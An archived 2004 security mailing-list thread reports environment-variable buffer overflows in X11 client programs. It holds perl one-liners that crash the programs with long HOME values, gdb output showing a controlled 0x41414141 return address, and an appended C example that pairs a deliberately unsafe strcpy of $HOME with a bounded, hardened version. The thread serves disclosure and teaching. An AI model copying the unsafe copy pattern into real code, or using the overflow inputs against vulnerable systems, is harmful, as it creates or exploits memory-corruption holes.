From: andfarm at teknovis.com (Andrew Farmer)
Subject: some small bugs.

On 15 Aug 2004, at 05:49, Noam Rathaus wrote:
> On Sunday 15 August 2004 00:32, Gabriele Galadini wrote:
>>  Hi all,
>>
>>  I've found some packages on obsd current version
>>  (3.5) on arch x86 that give me return problems.
>>
>>  I explain:
>>
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 4387'`
>>  mtv@...cuzio~$ dpsinfo
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 4387'`
>>  mtv@...cuzio~$ dpsinfo
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 5763'`
>>  mtv@...cuzio~$ dpsexec
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 1619'`
>>  mtv@...cuzio~$ mwm
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 2915'`
>>  mtv@...cuzio~$ xv
>>  Segmentation fault
>>  mtv@...cuzio~$ export HOME=`perl -e 'print "A" x 1013'`
>>  mtv@...cuzio~$ abiword
>>  Segmentation fault
>>
>>  shell used is bash version 2.05b
>>
>>  regards,
>>  G.
> Hi,
>
> Under Debian:
>
> #ll -l /usr/bin/X11/dpsinfo
> -rwxr-xr-x    1 root     root         6456 Jul  7 18:07 /usr/bin/X11/dpsinfo
>
> # gdb dpsinfo
> GNU gdb 6.1-debian
> Copyright 2004 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for details.
> This GDB was configured as "i386-linux"...(no debugging symbols found)...Using
> host libthread_db library "/lib/tls/libthread_db.so.1".
>
> (gdb) r
> Starting program: /usr/X11R6/bin/dpsinfo
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) bt
> #0  0x41414141 in ?? ()
>
> ----
>
> # ll /usr/bin/X11/dpsexec
> -rwxr-xr-x    1 root     root         8184 Jul  7 18:07 /usr/bin/X11/dpsexec
>
> # gdb dpsexec
> GNU gdb 6.1-debian
> Copyright 2004 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for details.
> This GDB was configured as "i386-linux"...(no debugging symbols found)...Using
> host libthread_db library "/lib/tls/libthread_db.so.1".
>
> (gdb) r
> Starting program: /usr/X11R6/bin/dpsexec
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
> (no debugging symbols found)...
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
>
> ----
>
> So Debian is also vulnerable; both these binaries come with the xbase-clients
> package.

However, the overflow does not lead to a security breach: none of the programs
in question are suid, so all you can do with an exploit is get a shell.

Which you already had, because you just launched the program from it :-)

In any case, the situation in which the bug shows up is so implausible
($HOME thousands of characters long) that it's barely worth fixing.
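As an added illustration of the bug class this thread is about (hypothetical example code, not the dpsinfo or dpsexec source, which the thread does not show): an unbounded copy of $HOME into a fixed stack buffer, beside a hardened version that sizes the copy first and refuses an oversize value instead of trusting the environment. The buffer size, the function names and the `/.dpsrc` suffix are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256   /* hypothetical fixed buffer size, not from any real program */

/* Vulnerable pattern (hypothetical; the thread does not show the real
 * dpsinfo/dpsexec source): $HOME is copied into a fixed stack buffer
 * with no length check, so a HOME of a few thousand bytes runs past the
 * buffer and over the saved return address, which is the 0x41414141
 * crash seen in gdb above. Kept for contrast only; nothing here calls it. */
void build_rc_path_unsafe(char *out, const char *home)
{
    char tmp[PATH_BUF];
    strcpy(tmp, home);             /* unbounded copy: the overflow */
    strcat(tmp, "/.dpsrc");
    strcpy(out, tmp);
}

/* Hardened version: treat the environment as untrusted input. Compute the
 * required size first and refuse oversize values rather than truncating
 * silently. Returns 0 on success, -1 if home is NULL, empty or too long. */
int build_rc_path(char *out, size_t outsz, const char *home)
{
    const char *suffix = "/.dpsrc";
    if (out == NULL || home == NULL || *home == '\0')
        return -1;
    size_t need = strlen(home) + strlen(suffix) + 1;   /* +1 for the NUL */
    if (need > outsz)
        return -1;
    int n = snprintf(out, outsz, "%s%s", home, suffix);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Reads HOME from the process environment and builds the path safely. */
int rc_path_from_env(char *out, size_t outsz)
{
    return build_rc_path(out, outsz, getenv("HOME"));
}

int main(void)
{
    char path[PATH_BUF];
    if (rc_path_from_env(path, sizeof path) == 0)
        printf("rc file: %s\n", path);
    else
        fprintf(stderr, "HOME unset or too long; refusing to continue\n");
    return 0;
}
```

Run with `HOME` set to a value of a few thousand bytes, as in the report above, and the hardened path returns -1 instead of crashing.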